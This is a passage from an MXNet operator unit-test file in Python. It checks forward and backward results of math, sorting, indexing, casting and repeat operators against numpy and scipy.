else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
